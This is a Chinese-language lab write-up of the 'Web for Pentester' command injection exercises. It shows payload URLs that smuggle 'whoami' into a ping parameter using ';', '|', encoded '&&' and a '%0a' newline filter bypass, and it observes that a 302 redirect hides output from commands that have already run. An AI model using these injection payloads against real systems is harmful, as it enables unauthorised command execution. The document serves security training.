Web for pentester_writeup之Commands injection篇
Commands injection(命令行注入)
代码注入和命令行注入有什么区别呢,代码注入涉及比较广泛,凡是由于过滤不严格或者是逻辑问题导致的可以插入恶意代码,都属于代码注入。而命令注入就局限于system函数的过滤不严格导致执行了系统命令。
总之就是代码注入主要是执行php代码,而命令注入主要是执行系统命令。
Example 1
![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808152219622-972400476.png)
这是一个简单的命令注入,执行的是ping一个ip的命令,这里我们可以使用;
和|
符号来拼接执行后面的命令,也可以使用&&
符号(需编码)。
Payload 1
http://192.168.219.136/commandexec/example1.php?ip=127.0.0.1;whoami
![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808150936709-1120481114.png)
>Payload2
`http://192.168.219.136/commandexec/example1.php?ip=127.0.0.1|whoami`
![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808151020397-112813302.png)
>Payload3
`http://192.168.219.136/commandexec/example1.php?ip=127.0.0.1%26%26whoami`
![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808151628051-917874083.jpg)
Example 2
![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808151229918-1544430189.png)
对IP地址参数做了相关过滤限制,这里我们使用%0a
换行符来切换命令至下一行执行
Payload
http://192.168.219.136/commandexec/example2.php?ip=127.0.0.1%0awhoami
![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808151243570-1671194848.png)
Example 3
![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808151259336-212764441.jpg)
我们发现换行符也不好使了,开启抓包模式,抓包发现程序有个302跳转,程序在运行时无论输入什么命令都会跳转Location: example3.php?ip=127.0.0.1
![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808151313164-2075732125.png)
查看返回数据包发现,跳转时已经执行了相关命令
![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808151320268-1858804467.png)